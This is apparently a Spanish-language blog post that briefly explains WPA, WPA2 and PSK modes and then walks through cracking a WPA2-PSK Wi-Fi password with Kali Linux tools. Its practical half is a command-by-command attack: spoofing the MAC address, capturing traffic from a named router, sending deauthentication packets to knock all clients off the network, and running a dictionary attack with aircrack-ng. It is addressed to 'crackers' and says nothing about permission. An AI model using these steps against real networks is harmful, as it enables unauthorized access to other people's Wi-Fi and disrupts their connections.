Hackeando WPA y WPA2 sin usar WPS

Saludos Crackers!!  Hoy quisiera explicar un poco de teoría de cifrado en redes inalambricas y a la vez también enseñarles como es posible crackear una red wifi "protegida" con WPA o WPA2 sin usar WPS...
Como sabrán me gusta siempre explicar la teoría antes de la practica y es eso lo que haremos ahora : 



WPA
Con servidor de autentificacion
Cifrado RC4 con TKIP (Ya vulnerable)
Redes corporativas y empresariales con servidor Radius (Enterprise)
Hardware antiguo se necesita actualizar el firmware.

WPA -2
Con servidor de autentificacion.
Cifrado CCMP: AES con clave de 128bits,
Redes corporativas y empresariales con servidor Radius (Enterprise)
Hardware que no lo integre no puede funcionar.

WPA -PSK
Sin servidor de autentificacion
Cifrado RC4 con TKIP
Redes domesticas o empresas pequeñas
Hardware antiguo se necesita actualizar el firmware.

WPA2-PSK
Sin servidor de autentificacion
Cifrado CCMP: AES con clave de 128bits,
Redes domesticas o empresas pequeñas
Hardware que no lo integre no puede funcionar.

*PSK : Pre Sahred Key, es la llave precompartida que conmunmente usamos para autenticarnos a una red Wifi 
* La redes empresariales usan un modo de autenticacion en Raidus el cual permite el ingreso independiente de cada uno de
los clientes a la red wifi
* WPS facilita la creacion de WLANs cuando esta funcion se habilita el asociaciamiento automatico, hay 2 modos:

  • Pulsando el boton del punto de acceso, esto sincroniza el dispositivo y el punto de acceso uniendolo a la red.
  • Mediante PIN: El punto de acceso te da un pin que es introducido por el dispositivo y lo une a la red.

Ahora vamos a explicar la practica de ataque y para ello me gustaría usar Kali Linux :



Primero vamos a ver la descripcion de nuestra tarjeta de red inalambrica 

ifconfig -a 

Posteriormente vamos a decirle a  Kali que detecte la tarjeta

airmon.ng

Como podemos ver esta detectando la interfaz wlan0 y la descripción de la tarjeta que vamos a usar

Lo siguiente es desactivar nuestra tarjeta de red inalambrica para cambiar nuestra Mac y la volvemos a activar, para eso usaremos lo siguiente 

ifconfig wlan0 down
macchanger -m 00:11:22:33:44:55 wlan0
ifconfig wlan0 up

Vamos a hacer un barrido para ver todos los puntos de acceso para ello nos ponemos en el modo de escucha o tambien llamado modo monitor .
airodump-ng mon0 



El siguiente paso es capturar paquetes para que de esta forma podamos crear el archivo .cap , para ello usaremos el siguiente comando en consola :

airodump-ng --bssid 5C:33:8E:A7:D4:B8 -c 7 -w wpa2labs.cap mon0

-- bssid : Es el MAC del router que vamos a atacar
-c : Es el canal en el que esta trabajando el router
-w : Especificamos el nombre del archivo .cap
mon0 : Es el interfaz de la red

Bueno! , ahora debemos esperar a que se autentique un nuevo cliente a la red o mejor aun podemos desconectar a todos y esperar a que se autentiquen nuevamente :

Para ello podemos usar el siguiente comando :

aireplay-ng -0 30 -a 5C:33:8E:A7:D4:B8 mon0
Aqui explicamos el numero 30 es el numero de desautenticaciones que vamos a mandar al router, luego especificamos la MAC del router y finalmente la interfaz de red que usamos




Una vez lo tenemos usaremos nuestro diccionario, puedes creartelo tu o puedes hacerlo. Simplemente es un bloc de notas con una contraseña por linea.

aircrack-ng -w 10kcommon.txt wpa2labs-01.cap

10kcommon.txt es el diccionario que vamos a usar y wpa2labs-01 es el archivo .cap que vamos a cracker, asi que solo quedaría esperar


Dependerá de que tan robusta sea la contraseña que queremos obtener, tambien de que tan bueno sea el diccionario y finalmente de que tan potente sea nuestro equipo.

Saludos!!


Powered by Blogger.